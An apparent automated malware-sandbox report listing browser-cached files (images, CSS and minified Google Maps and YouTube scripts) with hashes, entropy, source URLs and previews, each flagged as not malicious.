                                              Preview:(function(g){var window=this;/*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/.'use strict';var Ehb=function(a){a.mutedAutoplay=!1;a.endSeconds=NaN;a.limitedPlaybackDurationInSeconds=NaN;g.AQ(a)},Fhb=function(a){g.Po(a);.for(var b=0;b<a.eg.length;b++){var c=a.eg[b],d=a.Ry[b];if(d!==c.version)return!0;if(!g.No(c)||c.Pm)if(c.Pm||c.s_!==g.So)(c.P1(c)||Fhb(c))&&c.Q1(c),c.Pm=!1,c.s_=g.So;if(d!==c.version)return!0}return!1},b4=function(a){var b=g.Lo(a);.a={};return a[Symbol.dispose]=function(){g.Lo(b)},a},Ghb=function(){return{I:"svg",.X:{height:"100%",version:"1.1",viewBox:"0 0 110 26",width:"100%"},V:[{I:"path",Fc:!0,S:"ytp-svg-fill",X:{d:"M 16.68,.99 C 13.55,1.03 7.02,1.16 4.99,1.68 c -1.49,.4 -2.59,1.6 -2.99,3 -0.69,2.7 -0.68,8.31 -0.68,8.31 0,0 -0.01,5.61 .68,8.31 .39,1.5 1.59,2.6 2.99,3 2.69,.7 13.40,.68 13.40,.68 0,0 10.70,.01 13.40,-0.68 1.5,-0.4 2.59,-1.6 2.99,-3 .69,-2.7 .68,-8.31 .68,-8.31 0,0 .11,-5.61 -0.68,-8.31
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):9030
                                              Entropy (8bit):7.969340574476585
                                              Encrypted:false
                                              SSDEEP:192:QX6GCf2RrNG/Z6aZ49YonTudmkb0/1C6tcX4xLS24dZ3MSkiEwu+aZmBcF:03CfMG/ca4R7WN6CXMSn3vfkycF
                                              MD5:754860B84EA9C2BCC9C0E93B1683389D
                                              SHA1:A83558EBCCA1F95052D49A6E050762F0A62F5E1E
                                              SHA-256:2191E3101B6F3FD9465A2E451E3CE3B1536DD0B68B21740BE99BC548A6D5A387
                                              SHA-512:FB47FCAF7ED7DAC17AF294F1943443F6C3DF59C03EB0AD65B4F9083933DC86B58777B0D3E3AD05E524190FEC7849AC0E6FCA0D0C1E3D8BCE173C1BDC9263759B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/9.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<..".IDATx..].XT...Nr.FJ.P..P..).b..k..k.k.......`.&*.."...t3....0.G...e.e........9.y..;u1.M.$M.$M.$M.$M.$M.$M.$M.$M..;=M*..\y..3.G.?n;.....}..&..R.Y..\&-5.M+f.....?...(.3.........^..9X...WpE.$Ri.......-..6.n.3..=@$.5`k..!.....-..Y+.D.,.I...X..Xj..Jt...$..K#.sy"..(..,....~~......9.1....oI[..#..|.e.B..1...N....f.k../f]."..........%...+.{He.vl..Q&...shS..e..+2..m.Mz.1.........\...5g..5..NV.'.pB]:.a.n[G.|.....>9.S.65.R.G.So......:B&:......X1..P.?.....Iw.e..j....u..Y.*.,....Z.{V1.+.v.D*#)....`.3v.~m..#..P..L....42>O_.tvR..;.G.f..yc73.Ka....n.2.8....]..l4..K.*..#..J1..3#...!f..].vx..7...l.C..u.5w...{F.)..u...2..2.A..7.Z..^Pm_l.K..."..}.4.....z..<..........h....h../nn..nch....$h....!-.P..H...k>.@$....p............]8e;=r...."....42..>.".?T.......$t.S`..|....s0..N/`...{..`.'..g8!......s...&....'.......H..W.....8..L....:.Q.Y...........t.V...BfwF.Z....~.N.r.)................'/.u...1...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):104862
                                              Entropy (8bit):4.654487208781556
                                              Encrypted:false
                                              SSDEEP:1536:1h6T7kPStpJUjt7vKsUuzm8mOxnsVtw1pACJMQ:1he7kPStpJ0tfUuzlsVO1pACJv
                                              MD5:91A46E69386CCA20AA260D358DEA00A0
                                              SHA1:D560A4658353386216F949838E0EBD395B585538
                                              SHA-256:4C9E37E2CCB6DFB077A62074B86568CF2879EF88FD75F55DEEB5BE2ACF40DE6E
                                              SHA-512:49F4EDCDD8AB5113118118AE5EF1AAA3C7E538AC9476C5F113A47FBD9E7DB58E829596E44A55978D304001F76AAF3CFA52CDFF76AD32C98C0953F0712B0228F5
                                              Malicious:false
                                              Reputation:low
                                              Preview:/***************************************************..==================== JS INDEX ======================..****************************************************..00. Preloader..01. Cursor Animations..02. Offcanvas..03. Scroll Top..04. Modals..05. Header 1..06. Header 2..07. Header 3..08. Header 5..09. Header Search..10. Roll Slider..11. Workflow Slider..12. Team Slider..13. Testimonial Slider..14. Testimonial Slider 3..15. Portfolio Slider..16. Service 1..17. Counter..18. Button Hover Animation..19. Button Move Animation..20. Register GSAP..21. Config GSAP..22. Service 6..23. Choose Section..24. Portfolio 5 Animation ..25. Title Animation..26. Title Animation Top..27. Text Animation..28. Text Animation Top..29. Offcanvas Menu..30. Service 3..31. Folks animation..32. Menu Text Animation..33. Main Portfolio Sticky..34. Hero 3 Animation..35. Home Page 2 Animations..36. Award Animation..37. Portfolio Main Slider..38. Portfolio Animation..39. Portfolio Slider 2..40. Portfolio Slider 3..41.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 70 x 210, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4765
                                              Entropy (8bit):7.914349551855348
                                              Encrypted:false
                                              SSDEEP:96:C5raGXbfz6dbVDMp6GRoL2Ycy1EPAqI2I5aO6BLQZfYJq5K5Ic0u5NI3iE:mraAbL6NVD++aAqI2I5LDAJq5eIfuXi/
                                              MD5:9A942045EC3F115DAE872C3BE6B3A047
                                              SHA1:AF88E5C73E9D34C671A7ED099C0628C249DFD9E2
                                              SHA-256:EA80D10D991B201E42309C3FC535F9ABE17F5F37E4128A69E41E05B233DFB223
                                              SHA-512:7F5FA48CEE78FE5C887A8EB9C69076D03D6DD9B2B05E29CA4A0F7C48146064D4F94E9B0301910CBE6929B99121E99C2B309F2EEB564BDAE2F7E29259ABD66CDA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.gstatic.com/mapfiles/embed/images/entity11.png
                                              Preview:.PNG........IHDR...F...............dIDATx...utT.....K.HZ&......"W..n.e....?.........*.8$xm.H.PA..@3..~.........ae....Ygr...og.$}rU4{j..&...v.0....D...-*.........e} j.]...y.:`..\........QF........e$.1:`.-.QF.......T.<G.x.S.T.~.<G.x.S.T.~.<G.x.S...s$......>^1G..K......s$.......^1....Q....'..%..8.v.@a<.......R..;..8#...C[jQc...g$:.vhK-j.0a..p.2P..a<...e....x.3.%.@Qc.......(..h.7(.G...Tc.uC..z.S.]V.j..n.r].q..0.V.:.9..^......SiE..S......SiE..S...4Lk.D...D..~....Z+L....H.ZaB\.=..B..s..%.u.p...0.a...lWL..\jEI.u.p..E...0#.0/.)..+.Ki.3...R.&.....Da.?L4^..wA<..=.E*.S^^~(..D.S..\w0.d .`...a..%...L..@....'....n...0U...$D<..-..Ei.R.-.2}.I.S.|..bH../Z....%!J.|..bV../Z....%!..|..*...-....;.cq...F..9..c......\..p.u.d..........|.8q<.DH.".nwT@.T..WDwT@.T......ys+..|...d..@,E..Fag. ;1...a.v...S.7.....F..]=\..VC{...=.Oza5.Gk.;.}'.K.k..dO..u...v..=9>n.1.#.."){r.~b.k.me....nn.o+.....(....Y....w$.....=......s*t.NKG...".bX..+.uK...B;L....P/....|B-v.X.....8!.......8
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5183
                                              Entropy (8bit):7.900332339710944
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZS+5ARYDy0gGceY2JC:UIIHUCD4wa3SoARYDyGcP
                                              MD5:9AFAC2C96B6596962832FBABD8382642
                                              SHA1:152D37FC0C238DBB97C1EBC6ADEB4A2452B83886
                                              SHA-256:DC2BAF8E7BB9C32C7505E8DDF7E3CAF6D99E9EA23081F93A65E91EB5C404B89C
                                              SHA-512:4F9D68FFCE92CA7092070081EF5D379108AFF05C6F018800B3AFAF0965A7137942119E6A14F5749F575B0D72AF71560F9D308BD1C03C8CDCB1975271FF48A67F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):58040
                                              Entropy (8bit):7.996692211662229
                                              Encrypted:true
                                              SSDEEP:1536:6py/ASJLbTlToMR0H1fvyycDcS1NsyAFHMw4wVixrt+:PLbTW80xv4DcSzOsw4kIB+
                                              MD5:A6737A2676818047E2E6696895F5064F
                                              SHA1:89FC79F727BADB0FC7079B7E148210D99B94544E
                                              SHA-256:9D26A8D4866CAA5AD3B0712E33786AB4B81A6C9A944A3D3AA53BA54237B57F9D
                                              SHA-512:57F58DE0B068183B30EA15CC7A221DFA3EE3E8E6107369B2BF1CB427DC6D0ADC44FB1E010F5748552034A15E7588529B97812628E44BB37AFC888C2DE3D9C681
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 <........*....>.n.S)&3........en-.\_r.k...._...H.....vw..s....tv...lN...eC...|U.{.......>.^'......<....I.'.>...l.......O..w......~t.O.....+./.OE_...O....Lo_.*.......o.<'.....Y....w.......}....c..e.....w..........3.....o.?.|.~..?.w...._._........./..v$@..@=..[....i..C0-0..r.r..6E....?.........iH.p.M....T.r5..=,.{k.@..T.{..0(Y..rRw>.....F. .;.........12..y.u...T<P....Cl.........A........8..|....{$.Ut.{].......b....5...{.~U..u.]..S{.....cy.KW...3h....c5V.....g6..Nn....i..O4\.?.$.+X......&.#......u...dE....e\(........).~. H&+3.m........j.X._..l..s.?.%+.I....yiz3..CvE*.....k..n.C.&G.!.$I....+a.@*12.=.v..z.?.....'..'....r.2..T.m2...S.'l.Bi1..-Y...o...MOU..L.....A........H|.|..M..}.......Z.pM2e.6.;.y.H..}.U .<v.}H.!;.4"..i.U..r..P..P.w;.."5.[..Oc%.....n...D...Jv.c......2....);.....p..H....+.1EZ...........=.^.nDp....u..(..ik.....tT.....,"....D$t...c.7cd..Y.-7h...~ O.)......ok..L:..,l;7`.}....D...J.<..v.&j!=....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (535)
                                              Category:downloaded
                                              Size (bytes):223898
                                              Entropy (8bit):5.569634545782144
                                              Encrypted:false
                                              SSDEEP:6144:31hPTuFlPJ038r+G7Po9fsDB+ymJlC+RaWlKvLnF6YNgHeYA+jaL5hCw/3m+:31hPTuFlPJ038J7Po9EDBgJlC+RaWlKP
                                              MD5:55B9B3B92484C1952379CFC8F20CF7F6
                                              SHA1:8E1546F3A1A88D4B8B1A95C36CAC634632D40ACC
                                              SHA-256:33D6BF90C2E77B7BD99DABD4D581B12B00FF0CA711B04210C73510CB87A730D3
                                              SHA-512:1697C222E294E0001AAF84B64229CB6929E9A8FC4158BF3233B5FABC2206C11B61254AD69E7476C7DDFAF812A49F9D010AC11D416BDE5197B6300069104D7852
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/main.js
                                              Preview:(function(_){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2019 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*..Math.uuid.js (v1.4).http://www.broofa.com.mailto:robert@broofa.com.Copyright (c) 2010 Robert Kieffer.Dual licensed under the MIT and GPL licenses..*/.var aaa,la,oa,na,ra,caa,daa,eaa,ib,kb,haa,naa,paa,nc,oc,pc,rc,uaa,yaa,zaa,xaa,Iaa,Gaa,Haa,Eaa,Daa,Faa,zd,Kaa,Laa,xd,Maa,Oaa,Naa,Paa,Qaa,Md,Raa,Saa,Vaa,Waa,Yaa,Zaa,fe,bba,Fe,fba,iba,cba,hba,gba,eba,dba,jba,nba,We,qba,cf,rba,vba,xba,yba,zba,Cba,wf,xf,yf,zf,Eba,Fba,Jba,Gba,Iba,Cf,Nf,Kba,Pf,Qf,Lba,Mba,Oba,Qba,Rba,Vba,Wba,Vf,Xba,Uba,Sba,Tba,Zba,Yba,Xf,bca,aca,cca,ag,dca,fca,gca,hca,kca,gg,ig,jg,ica,jca,nca,kg,lg,mg,oca,og,ng,pca,rca,tca,xca,zca,yca,Bca,Aca,Gca,Hca,Lca,Mca,Fi,Oca,Pca,Qca,Tca,Sca,Uca,Oi,.Rca,Vca,oj,uj,Kj,Lj,bda,Uj,eda,gda
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):16161
                                              Entropy (8bit):7.981196196538167
                                              Encrypted:false
                                              SSDEEP:384:K0w3ekqxqlNCK/JYtUekr+GpVxbndg/9Zdhv/g:KR8q7PBYtUzr3pVddgrbvo
                                              MD5:B69B2CD6039A8C7B349717C504335D96
                                              SHA1:B36AC183696875AA6E1F3239A1300D28ECD468B5
                                              SHA-256:7821E94C51EB2A4EBB5AAB5D4F1DDC9D5E8481169DCD3617F6FDA24B99ADF363
                                              SHA-512:464F69DFEBBB546DA2F2FF96ED7A57F820AA026A22C9932E07AE826DD95C2E888CA9ABE6E92AF6FB4B3922190BB855386C2F6E4CE91C514688ACFE0E33498AAF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):131014
                                              Entropy (8bit):7.996066332495151
                                              Encrypted:true
                                              SSDEEP:3072:PN3PWpoX5t7Gn+jMBpWpCpnaZYhbly/u9YbT3T5LHGzyZxRJ7i:PVW6tan+Up7aCJweYr5HgC3J7
                                              MD5:D52B7315AD4725D876B72F30BB4038AA
                                              SHA1:E7B2572991BFACC116E1E9702938C028EBB6D261
                                              SHA-256:343E137A868ACB51BBD16EA1DD2252D8FE33B31A80C17457AFC30CD9373C596E
                                              SHA-512:A504584A5AFC8146C5AEF48F3E45BB60E56D68BDC9B614F74C6BAB7657555D325B3B6D47B4CAF46E5984658880A5659009F435237E036E0BEC6706525BB06273
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/services/website.webp
                                              Preview:RIFF....WEBPVP8X........?.....ALPH......0......@.$%+."..zB/...........]....GT..01...we..H..2.zf.".?............r..@t?.'."....o.....w.5.K..G;........!Q."..u(.j..1..2..CuP.!......v'..u'...N...6.(.....;u.o.o.o...,Q...U.xZ.7.P.u:.....N..`.ru.^])....'.......................b./..i........C..N.*..C....J....-.-p..7..t..q.sx.P....^..e.*.\.[?...c$.....&.Z....Lg..\g..y.(..:S.((.*.u.fCT!..ihV%..J.*.U....uh.+x*.Bc.....C...\...L.:6....Q.R"..qtn^..y}.......E.>..>...u..[m..s...kC......m(.........(.1..B.$..I^.2.6]84)..h........3.l.H.\..tH<.y.M.....&....L.*.....|.....B....t...:..:Y5...;........t@6.1..:..D.2....m,..P(..e:TFl.!4...7F.E:.Ya..M'V..`..p*p..@Q.M.*+......A.....H.{K..$..PR*.P>...p.P...5T..*UP.b...j'.V.;..2;...v8..vx.Uvl.!4.b ..[.zE....i$. l#...5R..W.k..2$...ko#r.d.Xb...+..%...O.<....jmb......M..D.. ..,.F...]......C..!....+... ?........Ld.m..d......${....d..!...W....E(..}...............-.....O..>.........>................VP8 .........*@...>Q&.F#.!...p..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2408)
                                              Category:downloaded
                                              Size (bytes):2613
                                              Entropy (8bit):5.088951532780355
                                              Encrypted:false
                                              SSDEEP:48:6Mt0IiA0lkvMFfHFFf3QrFfUqFfIFfpiFf8MT:6yircMTteSqqjiSA
                                              MD5:258DC9A657EDFCFC99DE35A8A2FBDA98
                                              SHA1:A92EA5D8FEA718CD59A5F00AE9CC198A4B1E2060
                                              SHA-256:5FBD6C86593DC305BF8D2E188BFBA4F236F3F02F3006E88D9E1466BCF3B6D691
                                              SHA-512:4350E84B9DDEE483267D110933374DBE580B50098FE066FBF8E8623524FCEC7C1B441D8CF074988FA0D1FAA2246BAD70BC305D1EF973E2C66E071511A26BACB2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/meanmenu.min.css
                                              Preview:/*! #######################################################################...MeanMenu 2.0.7..--------...To be used with jquery.meanmenu.js by Chris Wharton (http://www.meanthemes.com/plugins/meanmenu/)..####################################################################### */a.meanmenu-reveal{display:none}.mean-container .mean-bar{float:left;width:100%;position:relative;background:#0c1923;padding:4px 0;min-height:42px;z-index:999999}.mean-container a.meanmenu-reveal{width:22px;height:22px;padding:13px 13px 11px;position:absolute;top:0;right:0;cursor:pointer;color:#fff;text-decoration:none;font-size:16px;text-indent:-9999em;line-height:22px;font-size:1px;display:block;font-family:Arial,Helvetica,sans-serif;font-weight:700}.mean-container a.meanmenu-reveal span{display:block;background:#fff;height:3px;margin-top:3px}.mean-container .mean-nav{float:left;width:100%;background:#0c1923;margin-top:44px}.mean-container .mean-nav ul{padding:0;margin:0;width:100%;list-style-type:none}.mean-con
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):15064
                                              Entropy (8bit):7.691087878609802
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw6UhxwDNu/LlUiieZcZHr2WtF/WEP6FTk5qwHwooD55hBCNIjgvp6stE:4YNg7NX0WoekiWP/rCywWkbM5vpDtE
                                              MD5:AD6158AF455A77808B6D05FBEA5F275E
                                              SHA1:69AA2D88F33F180286D07264C6F98BE9850419DA
                                              SHA-256:BA759AB2E3D2FBF0B91963845578771B018D7AE4A03C9317BDDCA9962DEC6AB9
                                              SHA-512:936981AA3FB2F6DB0689722679646FD6400A6104CDFB61F389CE60E548EF7D58300D0CB2E3CB481EC3197D3E4E3DB8C92AD6D17C7F156247E92079F0C6AA76DF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6214
                                              Entropy (8bit):7.956233147740011
                                              Encrypted:false
                                              SSDEEP:96:3vOwtQZ2ipPFleort//yYGQrOAgpstO8ZW54J29XXOQtAb0mUNT7f5DR9Xl7pFf:/PQjxr0OrOVsNZW5cnXbdOf/jf
                                              MD5:FF0678D6C22399CD94C3E882FEA65524
                                              SHA1:94ABF0E2A9A90B78FE70A5BC6BA1DDC20469C086
                                              SHA-256:8D5C11A10CA82DF737DD52393175732A40DED91EACDDBE171DCAB835BAD9AA80
                                              SHA-512:DA1E4670F666781522D940A82ED89FBA5814BFCDA5DD48F40C73D565789678A7F34CB9A6EECBB6B7CF0EFD6B5CA55F3BEFB89B318360E6DEFD66E849E03326C4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..................`...........m......._........m....................W..f....t........S..]..g...........@T.....u......d..i....\cv....W......b.......~............m.....h....n........\........l.....gu......M......j.._...........Z..|9..............ar...]........Z.........................................3......gs...."..........>B......v...JM.KbN......................u...w....'....s....U.e.................n....;...f...........bt......K.M...............~...e.....e,......IDATh...S.......3...;...."1...H...d.IE@AP"r..e..*...#Geukk.,[..nm....|.B.q...B.....wy.axI.A.k...:X....1b."....rB.s..G.|%..k.*..". ..#H.#8.,?.8.9...X.......C0@.....3ug.F.$.?G......G9X;X,j.....eJ%.b.z.H$..!.../ ...S.vum..Xy..84.......:J.C./s....5...X^...#..R..X..O..j?.....J.....B.8..l>....c$W.0...e8....v.....aD.z....o....wW.@.@.C".|a;.qkmo{X.p..)..$........5i....>]$.......7..^:...X...c.#r(].[L.]...zY.U ...Q..T..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4440
                                              Entropy (8bit):7.35199130907316
                                              Encrypted:false
                                              SSDEEP:96:nBfd6CdlHUa15clADXKzh0ammRnbEhg3X/1tLwq:nB11ncp908bD3R
                                              MD5:8F8BC2286E823D24D028E4C2B7CE754D
                                              SHA1:DAFD86AFFC86550808E7E83EE798D61DAFA2D8C3
                                              SHA-256:38F3003CE12A8E7A1933104C908F17DD6B3AF20AF2F44657C976290CDC9B92F7
                                              SHA-512:41D6A11F075224B9186C35E9C5CBE3635BADF988383564BD4E37905EB17DBF393ACE7446E953C6F540B980C38D63AD12C65D97274035D3585660A00C43946CFF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............$.....sBIT.....O.....pHYs..._..._........tEXtSoftware.www.inkscape.org..<.....PLTE..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................K.....tRNS................................ !"#$%'()*+,-/0123456789;<=>?ABCDEFHIJKLMNOPQSTUWXYZ[]^_`abdeghiklmopqrstuvwyz{|}.............................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3156
                                              Entropy (8bit):5.794499969863823
                                              Encrypted:false
                                              SSDEEP:48:LtTvnhhhhhFHPAj5hhhhhhhhhhkG65O/2HJuaE4UJbam/e7/NQyQ/y:lvHAuHs/2HdJ1mycy
                                              MD5:3174F005FACAD6FF9A2EC3F0FF0B3610
                                              SHA1:0C20BC5A9222BB649284E4F289AD1A354EC0AD6B
                                              SHA-256:052B1B94AE3B291555F2062D21618F31A74E3D751922533A5615807EED8EE88D
                                              SHA-512:91F63221DD969436B7EC2F8E18AD3FC18B96CD28F583160D02DD3885E80E4D4C846CFCC536B461739EAF5B2D3F4D8CFB8D0D0A9FA4F9CD0A173D2EFB5E6E7361
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/multimedia.png
                                              Preview:.PNG........IHDR..............x......sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....IDATx...=.]i...g.EM..+.....&X..F..9N.?@..i2E.%_`0C..D..l.D.Jp.;m,.'"B.8./.-....._.Z........as...5..................................................................;..G.5...V?.(r..............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ .....T}..[..>=..W.|w....w......%....%............-..T..Z.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....;..G.5...V?.(b...@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@...oo}i[.m..G.V?..}.w5..-...H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ .....w.n..............W.....W..|..)....0....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13073
                                              Entropy (8bit):7.607193278682108
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwnlAd1s5K3Hx+hpuvi/Sy0zyuV4LuZnztjYUcQduoCKVJgefD+OTq:4YNg7nl55K3z6K9y3uZzzJVJTTq
                                              MD5:A5AD2A8B32450FEC36176E99EFFEA424
                                              SHA1:EE7BA4EDFBAEEC93FC196305F4FF76E9ECD77909
                                              SHA-256:15840E398D7E369F6D408920572461433C9F457D3B5A90E60DE651C626C47FB3
                                              SHA-512:B732D95A2F428FD7689E540B82F93E4BCE69959120661032EBDD4570A643FE10E66A6B0C2B504208A1CE5799E6C0163AB5235EE3ECE34B87C094F2264E121C75
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/38/546aad0f8767776b7190238e6cb3b6f7.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3664)
                                              Category:dropped
                                              Size (bytes):296574
                                              Entropy (8bit):5.4789881757349805
                                              Encrypted:false
                                              SSDEEP:6144:587K0nBdQUUiaWlA8c+NgYCsGsRthM7aSaQ/2pQVrrl/BM9NXuC2r:587K0nBdQUUiaN8cFYlM7aSas2pQVrrj
                                              MD5:263B942BC5E51BD9868FC0E2CAEA89A0
                                              SHA1:894341592CC3BCD96287651D2A32F4B7C6DE85CA
                                              SHA-256:1729747AE6545E8764A8BB3D0529ABB8681587FA816A9D7857B84D406BCB5AD2
                                              SHA-512:0B0F81624489AB0720CCD2B486546BFC350EC8D13929D43127B219F28D8A07728923A17A912E732E24A9FF631E605F2B5138F0EAD86585F0A87CE3508CE8479A
                                              Malicious:false
                                              Reputation:low
